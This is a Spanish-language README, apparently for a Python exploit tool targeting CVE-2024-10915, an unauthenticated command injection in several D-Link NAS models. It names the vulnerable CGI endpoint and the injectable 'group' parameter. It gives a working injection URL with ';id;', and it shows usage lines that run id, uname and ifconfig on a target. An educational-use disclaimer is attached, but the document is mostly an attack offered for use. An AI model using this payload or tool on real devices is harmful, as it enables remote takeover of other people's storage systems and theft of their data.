
Este exploit basado en Python aprovecha una vulnerabilidad de inyección de comandos en varios productos D-Link NAS a través del endpoint /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. La vulnerabilidad permite a atacantes no autenticados ejecutar comandos arbitrarios del sistema en el dispositivo afectado.
CVE-2024-10915 afecta a múltiples modelos de D-Link NAS. Un atacante puede inyectar comandos a través del parámetro group en el comando cgi_user_add, lo que permite la ejecución remota de código.
D-Link DNS-320
D-Link DNS-320LW
D-Link DNS-325
D-Link DNS-340L
Endpoint Vulnerable: /cgi-bin/account_mgr.cgi?cmd=cgi_user_add
http://192.168.1.100/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=';id;'
Python 3.x
Librería requests
Instala las dependencias necesarias:
pip3 install requests
usage: dlink_nas_rce_cve_2024_10915.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-o OUTPUT] [-l]
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "id" -p "http://127.0.0.1:8080" -o results.txt
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "uname" -p "http://127.0.0.1:8080" -o results.txt
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "ifconfig" -p "http://127.0.0.1:8080" -o results.txt
Este proyecto está destinado únicamente a fines educativos y de pruebas autorizadas. No utilices esta herramienta en redes o sistemas para los que no tengas permiso explícito. Los autores no asumen ninguna responsabilidad por el mal uso o los daños causados.
| Opción | Descripción |
|---|
-u / --url | URL base del objetivo (p. ej. http://192.168.1.100) |
-c / --command | Comando a ejecutar en el dispositivo (por defecto: id) |
-p / --proxy | Usar un proxy HTTP (p. ej. http://127.0.0.1:8080) |
-o / --output | Guardar la respuesta HTTP en un archivo |
-l / --list | Listar los productos D-Link NAS afectados |